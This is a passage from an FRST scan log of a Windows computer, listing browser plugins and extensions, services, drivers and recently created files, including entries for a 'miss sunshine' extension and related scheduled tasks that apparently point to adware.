FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll No File
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-22] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-22] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-22] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-22] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-22] (VideoLAN)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Air\nppdf32.dll [2012-09-23] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2012-09-19] (Adobe Systems)
FF Plugin HKU\S-1-5-21-2601788436-2821952545-4294816460-1002: @acestream.net/acestreamplugin,version=3.0.3 -> C:\Users\User\AppData\Roaming\ACEStream\player\npace_plugin.dll [2014-12-06] (Innovative Digital Technologies)
FF Plugin HKU\S-1-5-21-2601788436-2821952545-4294816460-1002: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\User\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-06-10] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @acestream.net/acestreamplugin,version=3.0.3 -> C:\Users\User\AppData\Roaming\ACEStream\player\npace_plugin.dll [2014-12-06] (Innovative Digital Technologies)
FF Plugin HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\User\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-06-10] (Unity Technologies ApS)
FF SearchPlugin: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\searchplugins\webster.xml [2013-11-03]
FF Extension: AS Magic Player - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\magicplayer@acestream.org [2014-11-01]
FF Extension: LastPass - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\support@lastpass.com [2015-03-06]
FF Extension: YouTube Unblocker - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\youtubeunblocker@unblocker.yt [2014-11-04]
FF Extension: WebSlingPlayer - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\{9EB34849-81D3-4841-939D-666D522B889A} [2013-11-07]
FF Extension: Download videos and MP3s from YouTube - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\{B64D9B05-48E1-4CEB-BF58-E0643994E900} [2014-08-11]
FF Extension: Extension List Dumper - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\extensionlistdumper@sogame.cat.xpi [2013-11-15]
FF Extension: YouTube Video and Audio Downloader - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\feca4b87-3be4-43da-a1b1-137c24220968@jetpack.xpi [2014-04-14]
FF Extension: YouTube Auto Replay - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\YouTubeAutoReplay@arikv.com.xpi [2014-04-14]
FF Extension: FlashGot - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\{19503e42-ca3c-4c27-b1e2-9cdb2170ee34}.xpi [2014-11-09]
FF Extension: PDFConverterLight - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\{41819e5a-4017-4be3-b1be-0868b2283ac1}.xpi [2014-11-30]
FF Extension: {80d2992f-5865-424f-bfbe-3e558ae15978} - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\{80d2992f-5865-424f-bfbe-3e558ae15978}.xpi [2014-11-19]
FF Extension: Adblock Plus - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2013-11-01]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: Logitech SetPoint - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2014-12-31]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn [2013-11-05]
FF HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\...\Firefox\Extensions: [{B64D9B05-48E1-4CEB-BF58-E0643994E900}] - C:\Program Files (x86)\Common Files\DVDVideoSoft\plugins\ff
FF Extension: Download videos and MP3s from YouTube - C:\Program Files (x86)\Common Files\DVDVideoSoft\plugins\ff [2014-08-11]
FF HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Firefox\Extensions: [{B64D9B05-48E1-4CEB-BF58-E0643994E900}] - C:\Program Files (x86)\Common Files\DVDVideoSoft\plugins\ff

Chrome:
=======
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-11-02]
CHR Extension: (Google Drive) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-11-02]
CHR Extension: (YouTube) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-11-02]
CHR Extension: (bmejphbfclcpmpohkggcjeibfilpamia) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\bmejphbfclcpmpohkggcjeibfilpamia [2015-04-06]
CHR Extension: (Google Search) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-11-02]
CHR Extension: (miss sunshine) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\didlppefmhmoiaeemeffjchbieeghlan [2015-04-06]
CHR Extension: (Adobe Acrobat - Create PDF) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2013-11-05]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2014-04-19]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-16]
CHR Extension: (SlingPlayer Web Plug-in) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\lidgnhlbmoakdjkfhanbhfngcadpaiac [2013-11-03]
CHR Extension: (No Name) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\mfhnkgpdlogbknkhlgdjlejeljbhflim [2014-11-01]
CHR Extension: (Google Wallet) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-11-02]
CHR Extension: (Gmail) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-11-02]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCChromeExtn\WCChromeExtn.crx [2012-09-23]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [266240 2012-06-05] (Brother Industries, Ltd.) [File not signed]
R2 ElevateService; C:\Program Files\GIGABYTE\SmartManagerV3\ElevateService.exe [19456 2014-01-06] () [File not signed]
R2 EpsonBidirectionalService; C:\Program Files (x86)\Common Files\EPSON\EBAPI\eEBSVC.exe [94208 2006-12-19] (SEIKO EPSON CORPORATION) [File not signed]
R2 EpsonScanSvc; C:\WINDOWS\system32\EscSvc64.exe [135824 2011-12-12] (Seiko Epson Corporation)
R2 ETDService; C:\Program Files\Elantech\ETDService.exe [99632 2013-10-01] (ELAN Microelectronics Corp.)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1152144 2015-03-27] (NVIDIA Corporation)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [15344 2013-03-22] (Intel Corporation)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [733696 2013-05-11] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [822232 2013-05-11] (Intel® Corporation)
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [131544 2013-05-31] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-05-31] (Intel Corporation)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2015-03-17] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1080120 2015-03-17] (Malwarebytes Corporation)
R2 Net Driver HPZ12; C:\Windows\System32\HPZinw12.dll [71680 2010-08-05] (Hewlett-Packard) [File not signed]
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1878672 2015-03-27] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [22995600 2015-03-27] (NVIDIA Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [1903472 2015-01-16] (Electronic Arts)
R2 Pml Driver HPZ12; C:\Windows\System32\HPZipm12.dll [89600 2010-08-05] (Hewlett-Packard) [File not signed]
R2 PnkBstrA; C:\WINDOWS\system32\PnkBstrA.exe [76152 2014-12-03] ()
R2 PnkBstrA; C:\WINDOWS\SysWOW64\PnkBstrA.exe [76888 2014-12-03] ()
R2 RemoteSolverDispatcher; C:\Program Files\SolidWorks Corp\SolidWorks Flow Simulation\binCFW\remotesolverdispatcherservice.exe [235656 2013-09-20] (Mentor Graphics Corporation) [File not signed]
S3 SolidWorks Licensing Service; C:\Program Files (x86)\Common Files\SolidWorks Shared\Service\SolidWorksLicensing.exe [79360 2013-11-10] (SolidWorks) [File not signed]
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 Update_Service; C:\Program Files\GIGABYTE\Smart Update\Update_Service.exe [136704 2015-02-11] (GIGABYTE) [File not signed]
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366520 2015-02-03] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-02-03] (Microsoft Corporation)
S2 LiveUpdateSvc; C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 ACPIGBT; C:\Windows\System32\drivers\ACPIGBT.sys [17408 2013-07-03] (Gigabyte United Inc.) [File not signed]
R3 BthA2DP; C:\Windows\system32\drivers\BthA2DP.sys [132608 2015-01-29] (Microsoft Corporation)
R3 BthLEEnum; C:\Windows\System32\drivers\BthLEEnum.sys [226304 2013-12-04] (Microsoft Corporation)
R3 btmaux; C:\Windows\system32\DRIVERS\btmaux.sys [140600 2013-07-22] (Motorola Solutions, Inc.)
R3 btmhsf; C:\Windows\system32\DRIVERS\btmhsf.sys [1408824 2013-10-18] (Motorola Solutions, Inc.)
S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-18] (Windows ® Win 7 DDK provider)
S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-18] (Windows ® Win 7 DDK provider)
R3 ibtusb; C:\Windows\system32\DRIVERS\ibtusb.sys [142280 2013-10-17] (Intel Corporation)
R1 jnprns; C:\Windows\system32\DRIVERS\jnprns.sys [507192 2014-06-16] (Juniper Networks)
S4 jnprTdi_806_48695; C:\WINDOWS\system32\Drivers\jnprTdi_806_48695.sys [108344 2014-08-07] (Juniper Networks, Inc.)
S3 jnprva; C:\Windows\system32\DRIVERS\jnprva.sys [30072 2014-01-14] (Juniper Networks, Inc.)
R3 JnprVaMgr; C:\Windows\system32\DRIVERS\jnprvamgr.sys [45352 2014-01-14] (Juniper Networks, Inc.)
S3 LGSHidFilt; C:\Windows\system32\DRIVERS\LGSHidFilt.Sys [64280 2013-05-30] (Logitech Inc.)
R2 mbamchameleon; C:\WINDOWS\system32\drivers\mbamchameleon.sys [107736 2015-03-17] (Malwarebytes Corporation)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-03-17] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [136408 2015-04-06] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-03-17] (Malwarebytes Corporation)
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [99800 2013-05-31] (Intel Corporation)
R3 NETwNb64; C:\Windows\system32\DRIVERS\NETwbw02.sys [3589600 2013-09-25] (Intel Corporation)
S3 NETwNe64; C:\Windows\system32\DRIVERS\NETwew02.sys [3648480 2013-08-30] (Intel Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19600 2015-03-27] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [38032 2014-11-22] (NVIDIA Corporation)
S3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [429272 2013-09-11] (Realsil Semiconductor Corporation)
S3 SaiHFF0D; C:\Windows\system32\DRIVERS\SaiHFF0D.sys [171144 2007-05-01] (Saitek)
R3 SaiMini; C:\Windows\System32\drivers\SaiMini.sys [25120 2013-04-30] (Saitek)
R3 SaiNtBus; C:\Windows\system32\drivers\SaiBus.sys [52640 2013-04-30] (Saitek)
S3 SaiUFF0D; C:\Windows\system32\DRIVERS\SaiUFF0D.sys [34304 2007-05-01] (Saitek)
S3 se64a; C:\Windows\System32\drivers\se64a.sys [14032 2007-05-03] (EnTech Taiwan)
R3 SensorsAlsDriver; C:\Windows\system32\DRIVERS\WUDFRd.sys [227840 2014-05-30] (Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-02-03] (Microsoft Corporation)
S3 WinRing0_1_2_0; C:\Users\User\AppData\Local\Temp\7zS7C1B.tmp\WinRing0x64.sys [14544 2012-10-18] (OpenLibSys.org)
S3 EagleX64; \??\C:\WINDOWS\system32\drivers\EagleX64.sys [X]
S3 JNPRNA; \SystemRoot\system32\DRIVERS\jnprna6.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-04-06 22:18 - 2015-04-06 22:18 - 00000000 ____D () C:\FRST
2015-04-06 22:17 - 2015-04-06 22:18 - 00000000 ____D () C:\Users\User\Desktop\Malware software
2015-04-06 21:55 - 2015-04-06 22:09 - 00136408 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2015-04-06 21:55 - 2015-04-06 21:55 - 00001125 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-04-06 21:55 - 2015-04-06 21:55 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-04-06 21:55 - 2015-04-06 21:55 - 00000000 ____D () C:\ProgramData\Malwarebytes
2015-04-06 21:55 - 2015-04-06 21:55 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-04-06 21:55 - 2015-03-17 06:15 - 00107736 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2015-04-06 21:55 - 2015-03-17 06:15 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2015-04-06 21:55 - 2015-03-17 06:15 - 00025816 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbam.sys
2015-04-06 21:38 - 2015-04-06 21:52 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2015-04-06 21:18 - 2015-04-06 21:53 - 00000004 _____ () C:\WINDOWS\SysWOW64\029B560A371F4E00AB32838EBC01B9E7
2015-04-06 20:18 - 2015-04-06 22:18 - 00001348 _____ () C:\WINDOWS\Tasks\miss_sunshine_notification_service.job
2015-04-06 20:18 - 2015-04-06 22:09 - 00001004 _____ () C:\WINDOWS\Tasks\oHBfPuiYh.job
2015-04-06 20:18 - 2015-04-06 22:09 - 00000710 _____ () C:\WINDOWS\Tasks\miss_sunshine_updating_service.job
2015-04-06 20:18 - 2015-04-06 22:08 - 00000000 ____D () C:\Program Files (x86)\miss sunshine
2015-04-06 20:18 - 2015-04-06 20:18 - 00004344 _____ () C:\WINDOWS\System32\Tasks\miss_sunshine_notification_service
2015-04-06 20:18 - 2015-04-06 20:18 - 00004008 _____ () C:\WINDOWS\System32\Tasks\oHBfPuiYh
2015-04-06 20:18 - 2015-04-06 20:18 - 00003706 _____ () C:\WINDOWS\System32\Tasks\miss_sunshine_updating_service
2015-04-03 21:58 - 2015-04-03 21:58 - 00000000 ___SD () C:\WINDOWS\SysWOW64\GWX
2015-04-03 21:58 - 2015-04-03 21:58 - 00000000 ___SD () C:\WINDOWS\system32\GWX
2015-04-02 00:31 - 2015-04-02 00:32 - 00000000 ____D () C:\Program Files (x86)\Wondershare
2015-04-01 23:00 - 2015-04-03 20:42 - 00000000 ____D () C:\Program Files (x86)\Zviewer
2015-04-01 23:00 - 2015-04-01 23:17 - 00000000 ____D () C:\Users\User\AppData\Roaming\Zviewer
2015-04-01 23:00 - 2015-04-01 23:00 - 00001014 _____ () C:\Users\Public\Desktop\Zviewer.lnk
2015-04-01 23:00 - 2015-04-01 23:00 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Zviewer
2015-03-31 01:14 - 2015-03-31 01:14 - 00004387 _____ () C:\Users\User\AppData\Roaming\oHBfPuiYh
2015-03-30 23:58 - 2015-03-30 23:58 - 00000000 ____D () C:\WINDOWS\SysWOW64\NV
2015-03-30 23:58 - 2015-03-30 23:58 - 00000000 ____D () C:\WINDOWS\system32\NV
2015-03-30 23:48 - 2015-03-30 23:48 - 00000000 ____D () C:\Users\User\AppData\Local\Steam
2015-03-30 23:43 - 2015-03-30 23:43 - 00000000 ____D () C:\Program Files (x86)\AGEIA Technologies
2015-03-30 23:42 - 2015-03-13 08:38 - 00622224 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2015-03-30 23:41 - 2015-03-13 12:41 - 32114888 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 25460880 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcompiler.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 24775368 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 20466376 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcompiler.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 18580512 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvwgf2umx.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 17258024 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvd3dumx.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 16022016 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvwgf2um.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 13297144 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 13210080 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 10775080 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 10715864 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 10262160 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvlddmkm.sys
2015-03-30 23:41 - 2015-03-13 12:41 - 03611792 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 03249352 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 02906928 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 01896136 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6434788.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 01557648 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6434788.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 00970384 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 00944784 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 00930448 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 00909512 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 00496272 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 00400584 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 00390288 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 00346824 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 00306208 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglshim32.dll
2015-03-30 23:41 - 2015-03-13 12:41 - 00032456 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvpciflt.sys
2015-03-30 23:30 - 2014-11-22 03:46 - 00038032 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys
2015-03-30 23:30 - 2014-11-22 03:46 - 00032400 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2015-03-30 23:20 - 2013-09-11 23:12 - 09889352 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\SysWOW64\RtsPerIcon.dll
2015-03-30 23:18 - 2015-03-30 23:18 - 00001014 _____ () C:\Users\Public\Desktop\Smart Update.lnk
2015-03-30 23:18 - 2015-03-30 23:18 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Smart Update
2015-03-21 22:21 - 2015-03-21 22:21 - 00001180 _____ () C:\Users\User\Desktop\Dropbox.lnk
2015-03-21 22:18 - 2015-04-06 22:10 - 00000000 ____D () C:\Users\User\AppData\Roaming\Dropbox
2015-03-21 22:18 - 2015-03-21 22:18 - 00000000 ____D () C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2015-03-21 09:44 - 2015-04-06 20:18 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2015-03-10 23:17 - 2015-02-03 16:58 - 00264000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdFilter.sys
2015-03-10 23:17 - 2015-02-03 16:58 - 00114496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdNisDrv.sys
2015-03-10 23:17 - 2015-02-03 16:58 - 00044024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdBoot.sys
2015-03-10 23:17 - 2015-02-02 16:53 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\winshfhc.dll
2015-03-10 23:17 - 2015-02-02 16:53 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winshfhc.dll
2015-03-10 23:17 - 2015-01-26 20:44 - 00933888 _____ (Microsoft Corporation) C:\WINDOWS\system32\calc.exe
2015-03-10 23:17 - 2015-01-23 18:51 - 00816128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\calc.exe
2015-03-10 23:16 - 2015-02-07 16:57 - 01090048 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll
2015-03-10 23:16 - 2015-02-07 16:49 - 00791040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MrmCoreR.dll
2015-03-10 23:16 - 2015-02-06 16:09 - 00396419 _____ () C:\WINDOWS\system32\ApnDatabase.xml
2015-03-10 23:16 - 2015-02-05 18:28 - 02257408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2015-03-10 23:16 - 2015-02-05 18:08 - 01943040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2015-03-10 23:16 - 2015-02-05 13:24 - 01113920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2015-03-10 23:16 - 2015-02-02 17:03 - 03551744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2015-03-10 23:16 - 2015-02-02 17:02 - 04298240 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2015-03-10 23:16 - 2015-01-30 16:42 - 03097600 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2015-03-10 23:16 - 2015-01-30 16:29 - 02484224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2015-03-10 23:16 - 2015-01-29 20:01 - 00132608 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BthA2DP.sys
2015-03-10 23:16 - 2015-01-29 20:01 - 00097792 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidbth.sys
2015-03-10 23:16 - 2015-01-29 20:00 - 00167424 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rfcomm.sys
2015-03-10 23:16 - 2015-01-29 19:03 - 01488896 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfc42u.dll
2015-03-10 23:16 - 2015-01-29 19:03 - 01464832 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfc42.dll
2015-03-10 23:16 - 2015-01-29 19:02 - 00102912 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappgnui.dll
2015-03-10 23:16 - 2015-01-29 18:44 - 01230336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfc42u.dll
2015-03-10 23:16 - 2015-01-29 18:42 - 01204224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfc42.dll
2015-03-10 23:16 - 2015-01-29 18:40 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappgnui.dll
2015-03-10 23:16 - 2015-01-29 18:37 - 00331776 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapp3hst.dll
2015-03-10 23:16 - 2015-01-29 18:29 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\atlthunk.dll
2015-03-10 23:16 - 2015-01-29 18:24 - 00339456 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapphost.dll
2015-03-10 23:16 - 2015-01-29 18:24 - 00250880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapp3hst.dll
2015-03-10 23:16 - 2015-01-29 18:16 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapphost.dll
